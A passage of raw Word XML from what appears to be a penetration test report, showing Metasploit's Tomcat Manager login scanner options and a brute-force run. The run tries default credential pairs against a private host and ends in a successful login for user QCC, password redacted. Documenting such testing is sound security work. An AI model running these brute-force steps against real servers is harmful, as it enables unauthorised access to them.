      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>24</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Setting Up Tomcat Login Scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1195B41E" w14:textId="42ABF0BC" w:rsidR="00C32C65" w:rsidRDefault="00C32C65" w:rsidP="000E6FF6">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>The tester validated scanner settings before running the tool.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGridLight"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A85D5C" w14:paraId="10EB7D36" w14:textId="77777777" w:rsidTr="004539C5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20B64FE1" w14:textId="77777777" w:rsidR="00DC296F" w:rsidRPr="00DC296F" w:rsidRDefault="00DC296F" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC296F">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">msf6 auxiliary(scanner/http/tomcat_mgr_login) &gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="004539C5">
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>show options</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC296F">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D2323B0" w14:textId="77777777" w:rsidR="00DC296F" w:rsidRPr="00DC296F" w:rsidRDefault="00DC296F" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="181CCC37" w14:textId="77777777" w:rsidR="00DC296F" w:rsidRPr="00DC296F" w:rsidRDefault="00DC296F" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC296F">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Module options (auxiliary/scanner/http/tomcat_mgr_login):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23D31314" w14:textId="77777777" w:rsidR="00DC296F" w:rsidRPr="00DC296F" w:rsidRDefault="00DC296F" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="738FA979" w14:textId="77777777" w:rsidR="00DC296F" w:rsidRPr="00DC296F" w:rsidRDefault="00DC296F" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC296F">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Name              Current Setting                     Required  Description</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69658489" w14:textId="77777777" w:rsidR="00DC296F" w:rsidRPr="00DC296F" w:rsidRDefault="00DC296F" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC296F">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>----              ---------------                     --------  -----------</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="769A6617" w14:textId="77777777" w:rsidR="00DC296F" w:rsidRPr="00DC296F" w:rsidRDefault="00DC296F" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC296F">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>BLANK_PASSWORDS   false                               no        Try blank passwords for all users</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C4B76E5" w14:textId="77777777" w:rsidR="00DC296F" w:rsidRPr="00DC296F" w:rsidRDefault="00DC296F" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC296F">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>BRUTEFORCE_SPEED  5                                   yes       How fast to bruteforce, from 0 to 5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="161CF075" w14:textId="08B20025" w:rsidR="00DC296F" w:rsidRPr="00DC296F" w:rsidRDefault="00DC296F" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC296F">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">DB_ALL_CREDS      false                             </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="00DC296F">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>no        Try each user/password couple stored in the current database</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F4173FF" w14:textId="77777777" w:rsidR="00DC296F" w:rsidRPr="00DC296F" w:rsidRDefault="00DC296F" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC296F">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>DB_ALL_PASS       false                               no        Add all passwords in the current database to the list</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D0BE005" w14:textId="77777777" w:rsidR="00DC296F" w:rsidRPr="00DC296F" w:rsidRDefault="00DC296F" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC296F">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>DB_ALL_USERS      false                               no        Add all users in the current database to the list</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B9DE654" w14:textId="77777777" w:rsidR="00DC296F" w:rsidRPr="00DC296F" w:rsidRDefault="00DC296F" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC296F">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>PASSWORD                                              no        The HTTP password to specify for authentication</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4399D512" w14:textId="77777777" w:rsidR="00DC296F" w:rsidRPr="00DC296F" w:rsidRDefault="00DC296F" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC296F">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>PASS_FILE         ../tomcat_mgr_default_pass.txt      no        File containing passwords, one per line</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F8FE1FC" w14:textId="77777777" w:rsidR="00DC296F" w:rsidRPr="00DC296F" w:rsidRDefault="00DC296F" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC296F">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Proxies                                               no        A proxy chain of format type:host:port[,type:host:port][...]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DDD8791" w14:textId="77777777" w:rsidR="00DC296F" w:rsidRPr="00DC296F" w:rsidRDefault="00DC296F" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC296F">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>RHOSTS            192.168.195.205                     yes       The target host(s), range CIDR identifier, or hosts file</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46A6ABCE" w14:textId="77777777" w:rsidR="00DC296F" w:rsidRPr="00DC296F" w:rsidRDefault="00DC296F" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC296F">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>RPORT             8080                                yes       The target port (TCP)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0319C76B" w14:textId="77777777" w:rsidR="00DC296F" w:rsidRPr="00DC296F" w:rsidRDefault="00DC296F" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC296F">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>SSL               false                               no        Negotiate SSL/TLS for outgoing connections</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F041596" w14:textId="77777777" w:rsidR="00DC296F" w:rsidRPr="00DC296F" w:rsidRDefault="00DC296F" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC296F">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>STOP_ON_SUCCESS   true                                yes       Stop guessing when a credential works for a host</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2ABCDA70" w14:textId="77777777" w:rsidR="00DC296F" w:rsidRPr="00DC296F" w:rsidRDefault="00DC296F" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC296F">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>TARGETURI         /manager/html                       yes       URI for Manager login. Default is /manager/html</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A14B4FC" w14:textId="77777777" w:rsidR="00DC296F" w:rsidRPr="00DC296F" w:rsidRDefault="00DC296F" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC296F">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>THREADS           1                                   yes       The number of concurrent threads (max one per host)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="776FE728" w14:textId="77777777" w:rsidR="00DC296F" w:rsidRPr="00DC296F" w:rsidRDefault="00DC296F" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC296F">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>USERNAME                                              no        The HTTP username to specify for authentication</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B03F1E7" w14:textId="77777777" w:rsidR="00DC296F" w:rsidRPr="00DC296F" w:rsidRDefault="00DC296F" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC296F">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>USERPASS_FILE     ../tomcat_mgr_default_userpass.txt  no        File containing users and passwords separated by space</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0163F4E0" w14:textId="77777777" w:rsidR="00DC296F" w:rsidRPr="00DC296F" w:rsidRDefault="00DC296F" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC296F">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>USER_AS_PASS      false                               no        Try the username as the password for all users</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72B5F390" w14:textId="77777777" w:rsidR="00DC296F" w:rsidRPr="00DC296F" w:rsidRDefault="00DC296F" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC296F">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>USER_FILE         ../tomcat_mgr_default_users.txt     no        File containing users, one per line</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="494DD260" w14:textId="77777777" w:rsidR="00DC296F" w:rsidRPr="00DC296F" w:rsidRDefault="00DC296F" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC296F">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>VERBOSE           true                                yes       Whether to print output for all attempts</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F17D8F8" w14:textId="13B5BAF6" w:rsidR="00A85D5C" w:rsidRDefault="00DC296F" w:rsidP="004539C5">
            <w:pPr>
              <w:widowControl/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC296F">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>VHOST                                                 no        HTTP server virtual host</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5EC612EB" w14:textId="3DD23726" w:rsidR="008241F8" w:rsidRDefault="004B0583" w:rsidP="004B0583">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="141D2B"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>25</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00DC296F">
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>hecking Scanner Options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3434F1E1" w14:textId="449A8718" w:rsidR="008241F8" w:rsidRDefault="00C32C65" w:rsidP="00520B63">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="141D2B"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>The tester then ran the Metasploit module to attempt to</w:t>
      </w:r>
      <w:r w:rsidR="004B0583">
        <w:t xml:space="preserve"> brute force the Tomcat Manager login credentials and was successful, retrieving the password for the </w:t>
      </w:r>
      <w:r w:rsidR="004B0583" w:rsidRPr="004B0583">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:color w:val="9FEF00"/>
        </w:rPr>
        <w:t>QCC</w:t>
      </w:r>
      <w:r w:rsidR="004B0583">
        <w:t xml:space="preserve"> user.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGridLight"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A85D5C" w14:paraId="30A0868C" w14:textId="77777777" w:rsidTr="004539C5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="656C98B1" w14:textId="77777777" w:rsidR="00A85D5C" w:rsidRPr="00A85D5C" w:rsidRDefault="00A85D5C" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A85D5C">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">msf6 auxiliary(scanner/http/tomcat_mgr_login) &gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="00A85D5C">
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>run</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="122AA209" w14:textId="77777777" w:rsidR="00A85D5C" w:rsidRPr="00A85D5C" w:rsidRDefault="00A85D5C" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0896DDAF" w14:textId="77777777" w:rsidR="00A85D5C" w:rsidRPr="00A85D5C" w:rsidRDefault="00A85D5C" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A85D5C">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>[!] No active DB -- Credential data will not be saved!</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EC32EB6" w14:textId="77777777" w:rsidR="00A85D5C" w:rsidRPr="00A85D5C" w:rsidRDefault="00A85D5C" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A85D5C">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>[-] 192.168.195.205:8080 - LOGIN FAILED: admin:admin (Incorrect)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40E3AF12" w14:textId="77777777" w:rsidR="00A85D5C" w:rsidRPr="00A85D5C" w:rsidRDefault="00A85D5C" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A85D5C">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>[-] 192.168.195.205:8080 - LOGIN FAILED: admin:manager (Incorrect)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79C00CCB" w14:textId="77777777" w:rsidR="00A85D5C" w:rsidRPr="00A85D5C" w:rsidRDefault="00A85D5C" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A85D5C">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>[-] 192.168.195.205:8080 - LOGIN FAILED: admin:role1 (Incorrect)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57B7BDFB" w14:textId="77777777" w:rsidR="00A85D5C" w:rsidRPr="00A85D5C" w:rsidRDefault="00A85D5C" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A85D5C">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>[-] 192.168.195.205:8080 - LOGIN FAILED: admin:root (Incorrect)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F00384D" w14:textId="77777777" w:rsidR="00A85D5C" w:rsidRPr="00A85D5C" w:rsidRDefault="00A85D5C" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A85D5C">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>[-] 192.168.195.205:8080 - LOGIN FAILED: admin:tomcat (Incorrect)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="128760EA" w14:textId="77777777" w:rsidR="00A85D5C" w:rsidRDefault="00A85D5C" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6E9DB484" w14:textId="33231F0B" w:rsidR="00A85D5C" w:rsidRDefault="00A85D5C" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;SNIP&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="656AC2D5" w14:textId="77777777" w:rsidR="00A85D5C" w:rsidRPr="00A85D5C" w:rsidRDefault="00A85D5C" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3CA2C54A" w14:textId="77777777" w:rsidR="00A85D5C" w:rsidRPr="00A85D5C" w:rsidRDefault="00A85D5C" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A85D5C">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>[-] 192.168.195.205:8080 - LOGIN FAILED: role1:admin (Incorrect)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1678E1EC" w14:textId="099ACBC1" w:rsidR="00A85D5C" w:rsidRPr="00A85D5C" w:rsidRDefault="00A85D5C" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A85D5C">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>[-] 192.168.195.205:8080 - LOGIN FAILED: cxsdk:kdsxc (Incorrect)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="367FC884" w14:textId="77777777" w:rsidR="00A85D5C" w:rsidRPr="00A85D5C" w:rsidRDefault="00A85D5C" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A85D5C">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>[-] 192.168.195.205:8080 - LOGIN FAILED: root:owaspbwa (Incorrect)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F3C491E" w14:textId="77777777" w:rsidR="00A85D5C" w:rsidRPr="00A85D5C" w:rsidRDefault="00A85D5C" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A85D5C">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>[-] 192.168.195.205:8080 - LOGIN FAILED: ADMIN:ADMIN (Incorrect)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26CDE395" w14:textId="77777777" w:rsidR="00A85D5C" w:rsidRPr="00A85D5C" w:rsidRDefault="00A85D5C" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A85D5C">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>[-] 192.168.195.205:8080 - LOGIN FAILED: xampp:xampp (Incorrect)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43A0A33F" w14:textId="77777777" w:rsidR="00A85D5C" w:rsidRPr="00A85D5C" w:rsidRDefault="00A85D5C" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A85D5C">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>[-] 192.168.195.205:8080 - LOGIN FAILED: tomcat:s3cret (Incorrect)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04A372BE" w14:textId="4ED23309" w:rsidR="00A85D5C" w:rsidRPr="00A85D5C" w:rsidRDefault="00A85D5C" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A85D5C">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>[+] 192.168.195.205:8080 - Login Successful: QCC:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;REDACTED&gt;</w:t>
            </w:r>
          </w:p>
